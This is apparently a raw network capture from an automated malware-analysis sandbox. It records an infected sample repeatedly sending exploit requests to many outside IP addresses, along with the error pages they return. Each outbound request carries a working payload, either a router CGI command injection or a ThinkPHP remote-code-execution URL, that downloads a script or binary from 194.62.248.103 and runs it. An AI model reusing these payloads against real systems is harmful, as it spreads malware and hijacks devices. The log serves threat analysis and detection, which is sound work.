                                                        Apr 14, 2024 16:37:46.926487923 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        704192.168.2.234833662.29.25.2038080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:45.343719006 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        705192.168.2.234643094.121.45.538080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:45.344259024 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        706192.168.2.234239294.121.119.1898080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:45.347294092 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        707192.168.2.234100888.99.32.7380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:45.845041037 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:46.149451971 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        708192.168.2.235834895.101.237.4180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:46.435738087 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:46.720900059 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:36:46 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:46 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 39 65 64 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 34 30 36 26 23 34 36 3b 34 64 33 32 38 30 34 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 32 39 65 64 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 34 30 36 26 23 34 36 3b 34 64 33 32 38 30 34 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;29ed655f&#46;1713105406&#46;4d32804<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;29ed655f&#46;1713105406&#46;4d32804</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        709192.168.2.235038495.110.201.3780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:46.750906944 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:47.066306114 CEST440INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 11:37:20 GMT
                                                        Server: Apache
                                                        Content-Length: 264
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 64 65 66 61 75 6c 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><hr><address>Apache Server at default Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        710192.168.2.233707895.216.29.21280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:46.756431103 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:47.077374935 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:46 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        711192.168.2.235884894.120.5.358080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:47.044862986 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        712192.168.2.235595031.200.57.2118080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:47.052694082 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        713192.168.2.234852688.210.102.1380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:47.068794012 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:47.850868940 CEST421INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:47 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        714192.168.2.234392085.122.227.78080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:47.295676947 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        715192.168.2.235526494.104.109.848080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:47.349648952 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        716192.168.2.235517895.214.145.1468080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:47.354275942 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        717192.168.2.235361888.214.20.1780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:47.372178078 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        718192.168.2.234569694.121.209.2398080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:47.382823944 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        719192.168.2.236010894.123.105.2028080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:47.395709038 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        720192.168.2.235842288.17.252.12380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:47.395728111 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:47.725308895 CEST600INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:47 GMT
                                                        Server: Apache
                                                        Vary: accept-language,accept-charset
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Language: en
                                                        Expires: Sun, 14 Apr 2024 14:36:47 GMT
                                                        Data Raw: 5b 61 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 70 72 6f 63 65 73 73 69 6e 67 20 74 68 69 73 20 64 69 72 65 63 74 69 76 65 5d 5b 61 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 70 72 6f 63 65 73 73 69 6e 67 20 74 68 69 73 20 64 69 72 65 63 74 69 76 65 5d 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22
                                                        Data Ascii: [an error occurred while processing this directive][an error occurred while processing this directive]<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="
                                                        Apr 14, 2024 16:36:47.725351095 CEST620INData Raw: 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 61 64 20 72 65 71 75 65 73 74 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 79 6f 75 40 65 78 61 6d 70 6c 65 2e
                                                        Data Ascii: en"><head><title>Bad request!</title><link rev="made" href="mailto:you@example.com" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address
                                                        Apr 14, 2024 16:36:47.726341963 CEST118INData Raw: 6c 6f 63 61 6c 68 6f 73 74 3c 2f 61 3e 3c 62 72 20 2f 3e 0a 20 20 0a 20 20 3c 73 70 61 6e 3e 53 75 6e 20 41 70 72 20 31 34 20 31 36 3a 33 36 3a 34 37 20 32 30 32 34 3c 62 72 20 2f 3e 0a 20 20 41 70 61 63 68 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 64
                                                        Data Ascii: localhost</a><br /> <span>Sun Apr 14 16:36:47 2024<br /> Apache</span></address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        721192.168.2.234129831.168.3.608080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:47.402982950 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        722192.168.2.234502288.248.22.14180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:47.430325031 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:47.784477949 CEST265INHTTP/1.1 200 OK
                                                        Content-type: application/octet-stream
                                                        Server: uc-httpd/1.0.0
                                                        Cache-Control: max-age=864000
                                                        Connection: Close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>404 File Not Found</title></head><body>The requested URL was not found on this server</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        723192.168.2.234557285.50.16.358080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:50.092971087 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
